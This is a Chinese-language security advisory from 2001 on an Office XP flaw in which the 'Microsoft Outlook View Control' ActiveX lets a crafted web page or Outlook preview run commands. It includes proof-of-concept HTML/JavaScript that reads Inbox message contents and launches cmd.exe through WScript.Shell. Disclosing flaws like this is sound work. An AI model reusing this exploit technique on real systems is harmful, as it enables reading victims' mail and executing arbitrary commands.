MS Office XP 存在任意文件可执行漏洞发布时间:2001-07-13 更新时间:2001-07-13 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:客户机模式 受影响系统 Win2K + IE 5.5 SP1 fully patched + Office XP.详细描述 如果一用户通过IE浏览特别设计的HTML页面或者打开或者通过 Outlook XP预览可以导致在他机器上执行任意命令,问题存在于ActiveX,Office XP相似安装了不好的Activex control- "Microsoft Outlook View Control". 这个控制可以导致访问 用户MAIL信息和使用Outlook "Application" object执行 任意代码。 测试代码 http://www.guninski.com/vv3-2demo.html ----------------------------------------------------- This assumes you have at least one message in Outlook XP's Inbox <br> <object id="o1" classid="clsid:0006F063-0000-0000-C000-000000000046" > <param name="folder" value="Inbox"> </object> <script> function f() { //alert(o2.object); sel=o1.object.selection; vv1=sel.Item(1); alert("Subject="+vv1.Subject); alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]"); alert("May be deleted"); //vv1.Delete(); vv2=vv1.Session.Application.CreateObject("WScript.Shell"); alert("Much more fun is possible"); vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ "); } setTimeout("f()",2000); </script> ----------------------------------------------------- 解决方案 尚无 相关信息 Georgi Guninski http://www.guninski.com |
